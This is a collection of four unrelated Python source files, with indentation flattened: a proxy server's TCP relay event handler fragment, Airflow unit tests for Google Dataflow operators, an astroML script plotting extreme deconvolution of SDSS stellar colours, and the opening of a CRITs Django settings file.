                # TIMEOUTS_CLEAN_SIZE entries and more than half of the queue
self._timeouts = self._timeouts[pos:]
for key in self._handler_to_timeouts:
self._handler_to_timeouts[key] -= pos
pos = 0
self._timeout_offset = pos
def handle_event(self, sock, fd, event):
# handle events and dispatch to handlers
if sock:
logging.log(shell.VERBOSE_LEVEL, 'fd %d %s', fd,
eventloop.EVENT_NAMES.get(event, event))
if sock == self._server_socket:
if event & eventloop.POLL_ERR:
# TODO
raise Exception('server_socket error')
try:
logging.debug('accept')
conn = self._server_socket.accept()
TCPRelayHandler(self, self._fd_to_handlers,
self._eventloop, conn[0], self._config,
self._dns_resolver, self._is_local)
except socket.error as err:
error_no = err.args[0]
if sys.platform == "win32":
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK, errno.WSAEWOULDBLOCK):
return
elif error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
return
else:
shell.print_exception(err)
if self._config['verbose']:
traceback.print_exc()
else:
if sock:
handler = self._fd_to_handlers.get(fd, None)
if handler:
handler.handle_event(sock, event)
else:
logging.warn('poll removed fd')
def handle_periodic(self):
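        # called periodically by the event loop: finish closing the listening
        # socket once close() has been requested, then sweep idle handlers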
if self._closed:
if self._server_socket:
self._eventloop.remove(self._server_socket)
self._server_socket.close()
self._server_socket = None
logging.info('closed TCP port %d', self._listen_port)
if not self._fd_to_handlers:
logging.info('stopping')
self._eventloop.stop()
self._sweep_timeout()
def close(self, next_tick=False):
logging.debug('TCP close')
self._closed = True
if not next_tick:
if self._eventloop:
self._eventloop.remove_periodic(self.handle_periodic)
self._eventloop.remove(self._server_socket)
self._server_socket.close()
for handler in list(self._fd_to_handlers.values()):
handler.destroy()
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import copy
import unittest
from copy import deepcopy
from unittest import mock
import airflow
from airflow.providers.google.cloud.operators.dataflow import (
CheckJobRunning,
DataflowCreateJavaJobOperator,
DataflowCreatePythonJobOperator,
DataflowStartFlexTemplateOperator,
DataflowStartSqlJobOperator,
DataflowTemplatedJobStartOperator,
)
from airflow.version import version
TASK_ID = 'test-dataflow-operator'
JOB_ID = 'test-dataflow-pipeline-id'
JOB_NAME = 'test-dataflow-pipeline-name'
TEMPLATE = 'gs://dataflow-templates/wordcount/template_file'
PARAMETERS = {
'inputFile': 'gs://dataflow-samples/shakespeare/kinglear.txt',
'output': 'gs://test/output/my_output',
}
PY_FILE = 'gs://my-bucket/my-object.py'
PY_INTERPRETER = 'python3'
JAR_FILE = 'gs://my-bucket/example/test.jar'
JOB_CLASS = 'com.test.NotMain'
PY_OPTIONS = ['-m']
DEFAULT_OPTIONS_PYTHON = DEFAULT_OPTIONS_JAVA = {
'project': 'test',
'stagingLocation': 'gs://test/staging',
}
DEFAULT_OPTIONS_TEMPLATE = {
'project': 'test',
'stagingLocation': 'gs://test/staging',
'tempLocation': 'gs://test/temp',
'zone': 'us-central1-f',
}
ADDITIONAL_OPTIONS = {'output': 'gs://test/output', 'labels': {'foo': 'bar'}}
TEST_VERSION = f"v{version.replace('.', '-').replace('+', '-')}"
EXPECTED_ADDITIONAL_OPTIONS = {
'output': 'gs://test/output',
'labels': {'foo': 'bar', 'airflow-version': TEST_VERSION},
}
POLL_SLEEP = 30
GCS_HOOK_STRING = 'airflow.providers.google.cloud.operators.dataflow.{}'
TEST_FLEX_PARAMETERS = {
"containerSpecGcsPath": "gs://test-bucket/test-file",
"jobName": 'test-job-name',
"parameters": {
"inputSubscription": 'test-subscription',
"outputTable": "test-project:test-dataset.streaming_beam_sql",
},
}
TEST_LOCATION = 'custom-location'
TEST_PROJECT = "test-project"
TEST_SQL_JOB_NAME = 'test-sql-job-name'
TEST_DATASET = 'test-dataset'
TEST_SQL_OPTIONS = {
"bigquery-project": TEST_PROJECT,
"bigquery-dataset": TEST_DATASET,
"bigquery-table": "beam_output",
'bigquery-write-disposition': "write-truncate",
}
TEST_SQL_QUERY = """
SELECT
sales_region as sales_region,
count(state_id) as count_state
FROM
bigquery.table.test-project.beam_samples.beam_table
GROUP BY sales_region;
"""
TEST_SQL_JOB = {'id': 'test-job-id'}
class TestDataflowPythonOperator(unittest.TestCase):
def setUp(self):
self.dataflow = DataflowCreatePythonJobOperator(
task_id=TASK_ID,
py_file=PY_FILE,
job_name=JOB_NAME,
py_options=PY_OPTIONS,
dataflow_default_options=DEFAULT_OPTIONS_PYTHON,
options=ADDITIONAL_OPTIONS,
poll_sleep=POLL_SLEEP,
location=TEST_LOCATION,
)
self.expected_airflow_version = 'v' + airflow.version.version.replace(".", "-").replace("+", "-")
def test_init(self):
"""Test DataFlowPythonOperator instance is properly initialized."""
assert self.dataflow.task_id == TASK_ID
assert self.dataflow.job_name == JOB_NAME
assert self.dataflow.py_file == PY_FILE
assert self.dataflow.py_options == PY_OPTIONS
assert self.dataflow.py_interpreter == PY_INTERPRETER
assert self.dataflow.poll_sleep == POLL_SLEEP
assert self.dataflow.dataflow_default_options == DEFAULT_OPTIONS_PYTHON
assert self.dataflow.options == EXPECTED_ADDITIONAL_OPTIONS
@mock.patch(
'airflow.providers.google.cloud.operators.dataflow.process_line_and_extract_dataflow_job_id_callback'
)
@mock.patch('airflow.providers.google.cloud.operators.dataflow.BeamHook')
@mock.patch('airflow.providers.google.cloud.operators.dataflow.DataflowHook')
@mock.patch('airflow.providers.google.cloud.operators.dataflow.GCSHook')
def test_exec(self, gcs_hook, dataflow_hook_mock, beam_hook_mock, mock_callback_on_job_id):
"""Test DataflowHook is created and the right args are passed to
        start_python_pipeline.
"""
start_python_mock = beam_hook_mock.return_value.start_python_pipeline
provide_gcloud_mock = dataflow_hook_mock.return_value.provide_authorized_gcloud
gcs_provide_file = gcs_hook.return_value.provide_file
job_name = dataflow_hook_mock.return_value.build_dataflow_job_name.return_value
self.dataflow.execute(None)
beam_hook_mock.assert_called_once_with(runner="DataflowRunner")
self.assertTrue(self.dataflow.py_file.startswith('/tmp/dataflow'))
gcs_provide_file.assert_called_once_with(object_url=PY_FILE)
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback=mock.ANY)
dataflow_hook_mock.assert_called_once_with(
gcp_conn_id="google_cloud_default",
delegate_to=mock.ANY,
poll_sleep=POLL_SLEEP,
impersonation_chain=None,
drain_pipeline=False,
cancel_timeout=mock.ANY,
wait_until_finished=None,
)
expected_options = {
"project": dataflow_hook_mock.return_value.project_id,
"staging_location": 'gs://test/staging',
"job_name": job_name,
"region": TEST_LOCATION,
'output': 'gs://test/output',
'labels': {'foo': 'bar', 'airflow-version': self.expected_airflow_version},
}
start_python_mock.assert_called_once_with(
variables=expected_options,
py_file=gcs_provide_file.return_value.__enter__.return_value.name,
py_options=PY_OPTIONS,
py_interpreter=PY_INTERPRETER,
py_requirements=None,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
dataflow_hook_mock.return_value.wait_for_done.assert_called_once_with(
job_id=mock.ANY,
job_name=job_name,
location=TEST_LOCATION,
multiple_jobs=False,
)
assert self.dataflow.py_file.startswith('/tmp/dataflow')
provide_gcloud_mock.assert_called_once_with()
class TestDataflowJavaOperator(unittest.TestCase):
def setUp(self):
self.dataflow = DataflowCreateJavaJobOperator(
task_id=TASK_ID,
jar=JAR_FILE,
job_name=JOB_NAME,
job_class=JOB_CLASS,
dataflow_default_options=DEFAULT_OPTIONS_JAVA,
options=ADDITIONAL_OPTIONS,
poll_sleep=POLL_SLEEP,
location=TEST_LOCATION,
)
self.expected_airflow_version = 'v' + airflow.version.version.replace(".", "-").replace("+", "-")
def test_init(self):
"""Test DataflowTemplateOperator instance is properly initialized."""
assert self.dataflow.task_id == TASK_ID
assert self.dataflow.job_name == JOB_NAME
assert self.dataflow.poll_sleep == POLL_SLEEP
assert self.dataflow.dataflow_default_options == DEFAULT_OPTIONS_JAVA
assert self.dataflow.job_class == JOB_CLASS
assert self.dataflow.jar == JAR_FILE
assert self.dataflow.options == EXPECTED_ADDITIONAL_OPTIONS
assert self.dataflow.check_if_running == CheckJobRunning.WaitForRun
@mock.patch(
'airflow.providers.google.cloud.operators.dataflow.process_line_and_extract_dataflow_job_id_callback'
)
@mock.patch('airflow.providers.google.cloud.operators.dataflow.BeamHook')
@mock.patch('airflow.providers.google.cloud.operators.dataflow.DataflowHook')
@mock.patch('airflow.providers.google.cloud.operators.dataflow.GCSHook')
def test_exec(self, gcs_hook, dataflow_hook_mock, beam_hook_mock, mock_callback_on_job_id):
"""Test DataflowHook is created and the right args are passed to
        start_java_pipeline.
"""
start_java_mock = beam_hook_mock.return_value.start_java_pipeline
gcs_provide_file = gcs_hook.return_value.provide_file
job_name = dataflow_hook_mock.return_value.build_dataflow_job_name.return_value
provide_gcloud_mock = dataflow_hook_mock.return_value.provide_authorized_gcloud
self.dataflow.check_if_running = CheckJobRunning.IgnoreJob
self.dataflow.execute(None)
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback=mock.ANY)
gcs_provide_file.assert_called_once_with(object_url=JAR_FILE)
expected_variables = {
'project': dataflow_hook_mock.return_value.project_id,
'stagingLocation': 'gs://test/staging',
'jobName': job_name,
'region': TEST_LOCATION,
'output': 'gs://test/output',
'labels': {'foo': 'bar', 'airflow-version': self.expected_airflow_version},
}
start_java_mock.assert_called_once_with(
variables=expected_variables,
jar=gcs_provide_file.return_value.__enter__.return_value.name,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
dataflow_hook_mock.return_value.wait_for_done.assert_called_once_with(
job_id=mock.ANY,
job_name=job_name,
location=TEST_LOCATION,
multiple_jobs=None,
)
provide_gcloud_mock.assert_called_once_with()
@mock.patch('airflow.providers.google.cloud.operators.dataflow.BeamHook')
@mock.patch('airflow.providers.google.cloud.operators.dataflow.DataflowHook')
@mock.patch('airflow.providers.google.cloud.operators.dataflow.GCSHook')
def test_check_job_running_exec(self, gcs_hook, dataflow_mock, beam_hook_mock):
"""Test DataflowHook is created and the right args are passed to
start_java_workflow.
"""
dataflow_running = dataflow_mock.return_value.is_job_dataflow_running
dataflow_running.return_value = True
start_java_hook = beam_hook_mock.return_value.start_java_pipeline
gcs_provide_file = gcs_hook.return_value.provide_file
self.dataflow.check_if_running = True
self.dataflow.execute(None)
self.assertTrue(dataflow_mock.called)
start_java_hook.assert_not_called()
gcs_provide_file.assert_called_once()
variables = {
'project': dataflow_mock.return_value.project_id,
'stagingLocation': 'gs://test/staging',
'jobName': JOB_NAME,
'region': TEST_LOCATION,
'output': 'gs://test/output',
'labels': {'foo': 'bar', 'airflow-version': self.expected_airflow_version},
}
dataflow_running.assert_called_once_with(name=JOB_NAME, variables=variables)
@mock.patch(
'airflow.providers.google.cloud.operators.dataflow.process_line_and_extract_dataflow_job_id_callback'
)
@mock.patch('airflow.providers.google.cloud.operators.dataflow.BeamHook')
@mock.patch('airflow.providers.google.cloud.operators.dataflow.DataflowHook')
@mock.patch('airflow.providers.google.cloud.operators.dataflow.GCSHook')
def test_check_job_not_running_exec(
self, gcs_hook, dataflow_hook_mock, beam_hook_mock, mock_callback_on_job_id
):
"""Test DataflowHook is created and the right args are passed to
        start_java_pipeline with the option to check if the job is running.
"""
is_job_dataflow_running_variables = None
def set_is_job_dataflow_running_variables(*args, **kwargs):
nonlocal is_job_dataflow_running_variables
is_job_dataflow_running_variables = copy.deepcopy(kwargs.get("variables"))
dataflow_running = dataflow_hook_mock.return_value.is_job_dataflow_running
dataflow_running.side_effect = set_is_job_dataflow_running_variables
dataflow_running.return_value = False
start_java_mock = beam_hook_mock.return_value.start_java_pipeline
gcs_provide_file = gcs_hook.return_value.provide_file
self.dataflow.check_if_running = True
self.dataflow.execute(None)
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback=mock.ANY)
gcs_provide_file.assert_called_once_with(object_url=JAR_FILE)
expected_variables = {
'project': dataflow_hook_mock.return_value.project_id,
'stagingLocation': 'gs://test/staging',
'jobName': JOB_NAME,
'region': TEST_LOCATION,
'output': 'gs://test/output',
'labels': {'foo': 'bar', 'airflow-version': self.expected_airflow_version},
}
self.assertEqual(expected_variables, is_job_dataflow_running_variables)
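# After the running-job check the operator presumably substitutes the
# generated job name, so the variables given to start_java_pipeline are
# expected to carry build_dataflow_job_name's return value, not JOB_NAME.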
job_name = dataflow_hook_mock.return_value.build_dataflow_job_name.return_value
expected_variables["jobName"] = job_name
start_java_mock.assert_called_once_with(
variables=expected_variables,
jar=gcs_provide_file.return_value.__enter__.return_value.name,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
dataflow_hook_mock.return_value.wait_for_done.assert_called_once_with(
job_id=mock.ANY,
job_name=job_name,
location=TEST_LOCATION,
multiple_jobs=None,
)
@mock.patch(
'airflow.providers.google.cloud.operators.dataflow.process_line_and_extract_dataflow_job_id_callback'
)
@mock.patch('airflow.providers.google.cloud.operators.dataflow.BeamHook')
@mock.patch('airflow.providers.google.cloud.operators.dataflow.DataflowHook')
@mock.patch('airflow.providers.google.cloud.operators.dataflow.GCSHook')
def test_check_multiple_job_exec(
self, gcs_hook, dataflow_hook_mock, beam_hook_mock, mock_callback_on_job_id
):
"""Test DataflowHook is created and the right args are passed to
start_java_workflow with option to check if job is running
"""
is_job_dataflow_running_variables = None
def set_is_job_dataflow_running_variables(*args, **kwargs):
nonlocal is_job_dataflow_running_variables
is_job_dataflow_running_variables = copy.deepcopy(kwargs.get("variables"))
dataflow_running = dataflow_hook_mock.return_value.is_job_dataflow_running
dataflow_running.side_effect = set_is_job_dataflow_running_variables
dataflow_running.return_value = False
start_java_mock = beam_hook_mock.return_value.start_java_pipeline
gcs_provide_file = gcs_hook.return_value.provide_file
self.dataflow.check_if_running = True
self.dataflow.multiple_jobs = True
self.dataflow.execute(None)
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback=mock.ANY)
gcs_provide_file.assert_called_once_with(object_url=JAR_FILE)
expected_variables = {
'project': dataflow_hook_mock.return_value.project_id,
'stagingLocation': 'gs://test/staging',
'jobName': JOB_NAME,
'region': TEST_LOCATION,
'output': 'gs://test/output',
'labels': {'foo': 'bar', 'airflow-version': self.expected_airflow_version},
}
self.assertEqual(expected_variables, is_job_dataflow_running_variables)
job_name = dataflow_hook_mock.return_value.build_dataflow_job_name.return_value
expected_variables["jobName"] = job_name
start_java_mock.assert_called_once_with(
variables=expected_variables,
jar=gcs_provide_file.return_value.__enter__.return_value.name,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
dataflow_hook_mock.return_value.wait_for_done.assert_called_once_with(
job_id=mock.ANY,
job_name=job_name,
location=TEST_LOCATION,
multiple_jobs=True,
)
class TestDataflowTemplateOperator(unittest.TestCase):
def setUp(self):
self.dataflow = DataflowTemplatedJobStartOperator(
task_id=TASK_ID,
template=TEMPLATE,
job_name=JOB_NAME,
parameters=PARAMETERS,
options=DEFAULT_OPTIONS_TEMPLATE,
dataflow_default_options={"EXTRA_OPTION": "TEST_A"},
poll_sleep=POLL_SLEEP,
location=TEST_LOCATION,
environment={"maxWorkers": 2},
)
@mock.patch('airflow.providers.google.cloud.operators.dataflow.DataflowHook')
def test_exec(self, dataflow_mock):
"""Test DataflowHook is created and the right args are passed to
start_template_workflow.
"""
start_template_hook = dataflow_mock.return_value.start_template_dataflow
self.dataflow.execute(None)
assert dataflow_mock.called
expected_options = {
'project': 'test',
'stagingLocation': 'gs://test/staging',
'tempLocation': 'gs://test/temp',
'zone': 'us-central1-f',
'EXTRA_OPTION': "TEST_A",
}
start_template_hook.assert_called_once_with(
job_name=JOB_NAME,
variables=expected_options,
parameters=PARAMETERS,
dataflow_template=TEMPLATE,
on_new_job_callback=mock.ANY,
project_id=None,
location=TEST_LOCATION,
environment={'maxWorkers': 2},
)
class TestDataflowStartFlexTemplateOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.dataflow.DataflowHook')
def test_execute(self, mock_dataflow):
start_flex_template = DataflowStartFlexTemplateOperator(
task_id="start_flex_template_streaming_beam_sql",
body={"launchParameter": TEST_FLEX_PARAMETERS},
do_xcom_push=True,
project_id=TEST_PROJECT,
location=TEST_LOCATION,
)
start_flex_template.execute(mock.MagicMock())
mock_dataflow.return_value.start_flex_template.assert_called_once_with(
body={"launchParameter": TEST_FLEX_PARAMETERS},
location=TEST_LOCATION,
project_id=TEST_PROJECT,
on_new_job_callback=mock.ANY,
)
def test_on_kill(self):
start_flex_template = DataflowStartFlexTemplateOperator(
task_id="start_flex_template_streaming_beam_sql",
body={"launchParameter": TEST_FLEX_PARAMETERS},
do_xcom_push=True,
location=TEST_LOCATION,
project_id=TEST_PROJECT,
)
start_flex_template.hook = mock.MagicMock()
start_flex_template.job = {"id": JOB_ID, "projectId": TEST_PROJECT, "location": TEST_LOCATION}
start_flex_template.on_kill()
start_flex_template.hook.cancel_job.assert_called_once_with(
job_id='test-dataflow-pipeline-id', project_id=TEST_PROJECT, location=TEST_LOCATION
)
class TestDataflowSqlOperator(unittest.TestCase):
@mock.patch('airflow.providers.google.cloud.operators.dataflow.DataflowHook')
def test_execute(self, mock_hook):
start_sql = DataflowStartSqlJobOperator(
task_id="start_sql_query",
job_name=TEST_SQL_JOB_NAME,
query=TEST_SQL_QUERY,
options=deepcopy(TEST_SQL_OPTIONS),
location=TEST_LOCATION,
do_xcom_push=True,
)
start_sql.execute(mock.MagicMock())
mock_hook.assert_called_once_with(
gcp_conn_id='google_cloud_default', delegate_to=None, drain_pipeline=False
)
mock_hook.return_value.start_sql_job.assert_called_once_with(
job_name=TEST_SQL_JOB_NAME,
query=TEST_SQL_QUERY,
options=TEST_SQL_OPTIONS,
location=TEST_LOCATION,
project_id=None,
on_new_job_callback=mock.ANY,
)
start_sql.job = TEST_SQL_JOB
start_sql.on_kill()
mock_hook.return_value.cancel_job.assert_called_once_with(
job_id='test-job-id', project_id=None, location=None
)
|
|
"""
Extreme Deconvolution of Stellar Data
-------------------------------------
Figure 6.12
Extreme deconvolution applied to stellar data from SDSS Stripe 82. The top
panels compare the color distributions for a high signal-to-noise sample of
standard stars (left) with lower signal-to-noise, single epoch, data (right).
The middle panels show the results of applying extreme deconvolution to the
single epoch data. The bottom panel compares the distributions of a color
measured perpendicularly to the locus (the so-called w color is defined
following Ivezic et al 2004). The distribution of colors from the extreme
deconvolution of the noisy data recovers the tight distribution of the high
signal-to-noise data.
"""
# Author: Jake VanderPlas
# License: BSD
# The figure produced by this code is published in the textbook
# "Statistics, Data Mining, and Machine Learning in Astronomy" (2013)
# For more information, see http://astroML.github.com
# To report a bug or issue, use the following forum:
# https://groups.google.com/forum/#!forum/astroml-general
from __future__ import print_function, division
import numpy as np
from matplotlib import pyplot as plt
from astroML.density_estimation import XDGMM
from astroML.crossmatch import crossmatch
from astroML.datasets import fetch_sdss_S82standards, fetch_imaging_sample
from astroML.plotting.tools import draw_ellipse
from astroML.decorators import pickle_results
from astroML.stats import sigmaG
#----------------------------------------------------------------------
# This function adjusts matplotlib settings for a uniform feel in the textbook.
# Note that with usetex=True, fonts are rendered with LaTeX. This may
# result in an error if LaTeX is not installed on your system. In that case,
# you can set usetex to False.
from astroML.plotting import setup_text_plots
setup_text_plots(fontsize=8, usetex=True)
#------------------------------------------------------------
# define u-g-r-i-z extinction from Berry et al, arXiv 1111.4985
# multiply extinction by A_r
extinction_vector = np.array([1.810, 1.400, 1.0, 0.759, 0.561])
#----------------------------------------------------------------------
# Fetch and process the noisy imaging data
data_noisy = fetch_imaging_sample()
# select only stars
data_noisy = data_noisy[data_noisy['type'] == 6]
# Get the extinction-corrected magnitudes for each band
X = np.vstack([data_noisy[f + 'RawPSF'] for f in 'ugriz']).T
Xerr = np.vstack([data_noisy[f + 'psfErr'] for f in 'ugriz']).T
# extinction terms from Berry et al, arXiv 1111.4985
X -= (extinction_vector * data_noisy['rExtSFD'][:, None])
#----------------------------------------------------------------------
# Fetch and process the stacked imaging data
data_stacked = fetch_sdss_S82standards()
# cut to RA, DEC range of imaging sample
RA = data_stacked['RA']
DEC = data_stacked['DEC']
data_stacked = data_stacked[(RA > 0) & (RA < 10) &
(DEC > -1) & (DEC < 1)]
# get stacked magnitudes for each band
Y = np.vstack([data_stacked['mmu_' + f] for f in 'ugriz']).T
Yerr = np.vstack([data_stacked['msig_' + f] for f in 'ugriz']).T
# extinction terms from Berry et al, arXiv 1111.4985
Y -= (extinction_vector * data_stacked['A_r'][:, None])
# quality cuts
g = Y[:, 1]
mask = ((Yerr.max(1) < 0.05) &
(g < 20))
data_stacked = data_stacked[mask]
Y = Y[mask]
Yerr = Yerr[mask]
#----------------------------------------------------------------------
# cross-match
# the imaging sample contains both standard and variable stars. We'll
# perform a cross-match with the standard star catalog and choose objects
# which are common to both.
Xlocs = np.hstack((data_noisy['ra'][:, np.newaxis],
data_noisy['dec'][:, np.newaxis]))
Ylocs = np.hstack((data_stacked['RA'][:, np.newaxis],
data_stacked['DEC'][:, np.newaxis]))
print("number of noisy points: ", Xlocs.shape)
print("number of stacked points:", Ylocs.shape)
# find all points within 0.9 arcsec. This cutoff was selected
# by plotting a histogram of the log(distances).
dist, ind = crossmatch(Xlocs, Ylocs, max_distance=0.9 / 3600)
noisy_mask = (~np.isinf(dist))
stacked_mask = ind[noisy_mask]
# select the data
data_noisy = data_noisy[noisy_mask]
X = X[noisy_mask]
Xerr = Xerr[noisy_mask]
data_stacked = data_stacked[stacked_mask]
Y = Y[stacked_mask]
Yerr = Yerr[stacked_mask]
# double-check that our cross-match succeeded
assert X.shape == Y.shape
print("size after crossmatch:", X.shape)
#----------------------------------------------------------------------
# perform extreme deconvolution on the noisy sample
# first define mixing matrix W
W = np.array([[0, 1, 0, 0, 0], # g magnitude
[1, -1, 0, 0, 0], # u-g color
[0, 1, -1, 0, 0], # g-r color
[0, 0, 1, -1, 0], # r-i color
[0, 0, 0, 1, -1]]) # i-z color
X = np.dot(X, W.T)
Y = np.dot(Y, W.T)
# compute error covariance from mixing matrix
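# The per-band errors in Xerr are treated as independent, so each star's
# covariance in ugriz space is diagonal; the fancy indexing below fills
# those diagonals with the squared errors.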
Xcov = np.zeros(Xerr.shape + Xerr.shape[-1:])
Xcov[:, range(Xerr.shape[1]), range(Xerr.shape[1])] = Xerr ** 2
# each covariance C = WCW^T
# best way to do this is with a tensor dot-product
Xcov = np.tensordot(np.dot(Xcov, W.T), W, (-2, -1))
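# (np.dot(Xcov, W.T) forms C.W^T for every star; tensordot then contracts the
# remaining magnitude axis with W, giving W.C.W^T for each star at once.)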
#----------------------------------------------------------------------
# This is a long calculation: save results to file
@pickle_results("XD_stellar.pkl")
def compute_XD(n_clusters=12, rseed=0, n_iter=100, verbose=True):
np.random.seed(rseed)
clf = XDGMM(n_clusters, n_iter=n_iter, tol=1E-5, verbose=verbose)
clf.fit(X, Xcov)
return clf
clf = compute_XD(12)
#------------------------------------------------------------
# Fit and sample from the underlying distribution
np.random.seed(42)
X_sample = clf.sample(X.shape[0])
#------------------------------------------------------------
# plot the results
fig = plt.figure(figsize=(5, 3.75))
fig.subplots_adjust(left=0.12, right=0.95,
bottom=0.1, top=0.95,
wspace=0.02, hspace=0.02)
# only plot 1/10 of the stars for clarity
ax1 = fig.add_subplot(221)
ax1.scatter(Y[::10, 2], Y[::10, 3], s=9, lw=0, c='k')
ax2 = fig.add_subplot(222)
ax2.scatter(X[::10, 2], X[::10, 3], s=9, lw=0, c='k')
ax3 = fig.add_subplot(223)
ax3.scatter(X_sample[::10, 2], X_sample[::10, 3], s=9, lw=0, c='k')
ax4 = fig.add_subplot(224)
for i in range(clf.n_components):
draw_ellipse(clf.mu[i, 2:4], clf.V[i, 2:4, 2:4], scales=[2],
ec='k', fc='gray', alpha=0.2, ax=ax4)
titles = ["Standard Stars", "Single Epoch",
"Extreme Deconvolution\n resampling",
"Extreme Deconvolution\n cluster locations"]
ax = [ax1, ax2, ax3, ax4]
for i in range(4):
ax[i].set_xlim(-0.6, 1.8)
ax[i].set_ylim(-0.6, 1.8)
ax[i].xaxis.set_major_locator(plt.MultipleLocator(0.5))
ax[i].yaxis.set_major_locator(plt.MultipleLocator(0.5))
ax[i].text(0.05, 0.95, titles[i],
ha='left', va='top', transform=ax[i].transAxes)
if i in (0, 1):
ax[i].xaxis.set_major_formatter(plt.NullFormatter())
else:
ax[i].set_xlabel('$g-r$')
if i in (1, 3):
ax[i].yaxis.set_major_formatter(plt.NullFormatter())
else:
ax[i].set_ylabel('$r-i$')
#------------------------------------------------------------
# Second figure: the width of the locus
fig = plt.figure(figsize=(5, 3.75))
ax = fig.add_subplot(111)
labels = ['single epoch', 'standard stars', 'XD resampled']
linestyles = ['solid', 'dashed', 'dotted']
for data, label, ls in zip((X, Y, X_sample), labels, linestyles):
g = data[:, 0]
gr = data[:, 2]
ri = data[:, 3]
r = g - gr
i = r - ri
mask = (gr > 0.3) & (gr < 1.0)
g = g[mask]
r = r[mask]
i = i[mask]
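# w is the color measured perpendicular to the stellar locus (following
# Ivezic et al 2004); its scatter is a measure of the locus width.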
w = -0.227 * g + 0.792 * r - 0.567 * i + 0.05
sigma = sigmaG(w)
ax.hist(w, bins=np.linspace(-0.08, 0.08, 100), linestyle=ls,
histtype='step', label=label + '\n\t' + r'$\sigma_G=%.3f$' % sigma,
normed=True)
ax.legend(loc=2)
ax.text(0.95, 0.95, '$w = -0.227g + 0.792r$\n$ - 0.567i + 0.05$',
transform=ax.transAxes, ha='right', va='top')
ax.set_xlim(-0.07, 0.07)
ax.set_ylim(0, 55)
ax.set_xlabel('$w$')
ax.set_ylabel('$N(w)$')
plt.show()
|
|
# CRITs environment chooser
import errno
import glob
import os
import sys
import django
import subprocess
from pymongo import ReadPreference, MongoClient
from mongoengine import connect
sys.path.insert(0, os.path.dirname(__file__))
# calculated paths for django and the site
# used as starting points for various other paths
DJANGO_ROOT = os.path.dirname(os.path.realpath(django.__file__))
SITE_ROOT = os.path.dirname(os.path.realpath(__file__))
# Version
CRITS_VERSION = '4-master'
# the following gets the current git hash to be displayed in the footer and
# hides it if this is not a git repo
try:
HIDE_GIT_HASH = False
# get the short form of the current git hash
GIT_HASH = subprocess.check_output(['git', 'rev-parse', '--short', 'HEAD'], cwd=SITE_ROOT).strip()
# get the full form of the current git hash
GIT_HASH_LONG = subprocess.check_output(['git', 'rev-parse', 'HEAD'], cwd=SITE_ROOT).strip()
# get the current git branch
GIT_BRANCH = subprocess.check_output(['git', 'rev-parse', '--abbrev-ref', 'HEAD'], cwd=SITE_ROOT).strip()
except:
#if it is not a git repo, clear out all values and hide them
GIT_HASH = ''
GIT_HASH_LONG = ''
HIDE_GIT_HASH = True
GIT_BRANCH = ''
APPEND_SLASH = True
TEST_RUN = False
# Set to DENY|SAMEORIGIN|ALLOW-FROM uri
# Default: SAMEORIGIN
# More details: https://developer.mozilla.org/en-US/docs/HTTP/X-Frame-Options
#X_FRAME_OPTIONS = 'ALLOW-FROM https://www.example.com'
SECURE_SSL_REDIRECT = True
# Setup for runserver or Apache
if 'runserver' in sys.argv:
DEVEL_INSTANCE = True
SERVICE_MODEL = 'thread'
SESSION_COOKIE_SECURE = False
CSRF_COOKIE_SECURE = False
LOGIN_URL = "/login/"
elif 'test' in sys.argv:
TEST_RUN = True
DEVEL_INSTANCE = True
SERVICE_MODEL = 'thread'
SESSION_COOKIE_SECURE = False
CSRF_COOKIE_SECURE = False
LOGIN_URL = "/login/"
else:
DEVEL_INSTANCE = True
SERVICE_MODEL = 'process'
SESSION_COOKIE_SECURE = True
CSRF_COOKIE_SECURE = True
LOGIN_URL = "/login/"
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.dummy'
}
}
# MongoDB Default Configuration
# Tip: To change database settings, override by using
# template from config/database_example.py
MONGO_HOST = 'localhost' # server to connect to
MONGO_PORT = 27017 # port MongoD is running on
MONGO_DATABASE = 'crits' # database name to connect to
MONGO_SSL = False # whether MongoD has SSL enabled
MONGO_USER = '' # username used to authenticate to mongo (normally empty)
MONGO_PASSWORD = '' # password for the mongo user
# File storage backends
S3 = "S3"
GRIDFS = "GRIDFS"
# DB to use for files
FILE_DB = GRIDFS
# S3 buckets
BUCKET_PCAPS = "pcaps"
BUCKET_OBJECTS = "objects"
BUCKET_SAMPLES = "samples"
# Import custom Database config
dbfile = os.path.join(SITE_ROOT, 'config/database.py')
if os.path.exists(dbfile):
execfile(dbfile)
if TEST_RUN:
MONGO_DATABASE = 'crits-unittest'
# Read preference to configure which nodes you can read from
# Possible values:
# primary: queries are sent to the primary node in a replica set
# secondary: queries are allowed if sent to primary or secondary
# (for single host) or are distributed to secondaries
# if you are connecting through a router
# More info can be found here:
# http://api.mongodb.org/python/current/api/pymongo/index.html
MONGO_READ_PREFERENCE = ReadPreference.PRIMARY
# MongoDB default collections
COL_ACTORS = "actors" # main collection for actors
COL_ACTOR_IDENTIFIERS = "actor_identifiers" # main collection for actor identifiers
COL_ACTOR_THREAT_IDENTIFIERS = "actor_threat_identifiers" # actor threat identifiers
COL_ACTOR_THREAT_TYPES = "actor_threat_types" # actor threat types
COL_ACTOR_MOTIVATIONS = "actor_motivations" # actor motivations
COL_ACTOR_SOPHISTICATIONS = "actor_sophistications" # actor sophistications
COL_ACTOR_INTENDED_EFFECTS = "actor_intended_effects" # actor intended effects
